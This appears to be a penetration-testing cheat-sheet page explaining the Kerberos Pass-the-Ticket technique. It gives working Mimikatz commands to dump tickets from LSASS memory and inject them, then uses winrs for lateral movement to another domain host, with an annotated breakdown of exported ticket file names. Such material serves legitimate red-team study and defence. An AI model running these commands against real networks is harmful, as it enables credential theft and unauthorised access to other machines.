Pass The Ticket
Administrators
Extracting
Ticket Granting Services Will Require us to have Administrator's Credentials.
Standard
Injecting
Tickets in our own Session Doesn't Require Administrator Privileges.
Sometimes it will be possible to extract Kerberos
Tickets and Session Keys from LSASS
Memory using Mimikatz
. The process usually requires us to have SYSTEM Privileges on the Target Machine.
privilege::debug
sekurlsa::tickets /export
While Mimikatz
can extract any TGT or TGS Available from the Memory of the LSASS Process, most of the time, we'll be interested in TGT's as they can be used to request access to any Services the user is allowed to access. At the same time, TGSs are only good for a specific service.
Extracting TGT's will require us to have Administrator's Credentials, and extracting TGSs can be done with a Low-Privileged Account [Only the ones assigned to that Account]
Using the Ticket
:: Injecting the Ticket
kerberos::ptt [0;e06e9]-0-0-40a50000-delilah.gomez@LDAP-DC.DOMAIN.com.kirbi
Injecting Tickets in our own Session doesn't require Administrator Privileges. After this, the tickets will be available for any Tools we use for Lateral Movement.
:: Displays a list of currently Cached Kerberos Tickets
klist
Once we have a Command Prompt with the Credentials Loaded we can use winrs
to connect to another TARGET on the Domain since the Credentials are Injected into our Session.
:: The [Username - Password] Fields are not Necessary because the Credentials are already Injected
winrs.exe -r:TARGET cmd
Deeper Explanation
Once the Tickets are Extracted they are going to be Available in the same Folder as Mimikatz
.
[0;97d82]-2-0-40e10000-t2_felicia.dean@krbtgt-DOMAIN.COM.kirbi
└───────┘ ^ └────────┘ └─────────────┘ └───────────────┘└────┘
| | | | | └─────► 6. File Extension
| | | | |
| | | | └─────► 5. Resource
| | | |
| | | └─────► 4. User - Computer Account [Ticket Owner]
| | |
| | └─────► 3. 0x40e10000 Kerberos Flag
| |
| └─────► 2. Kerberos Ticket Type
| 0 = TGS / 1 = Client Ticket / 2 = TGT
|
└─────► 1. 0x97d82 User LUID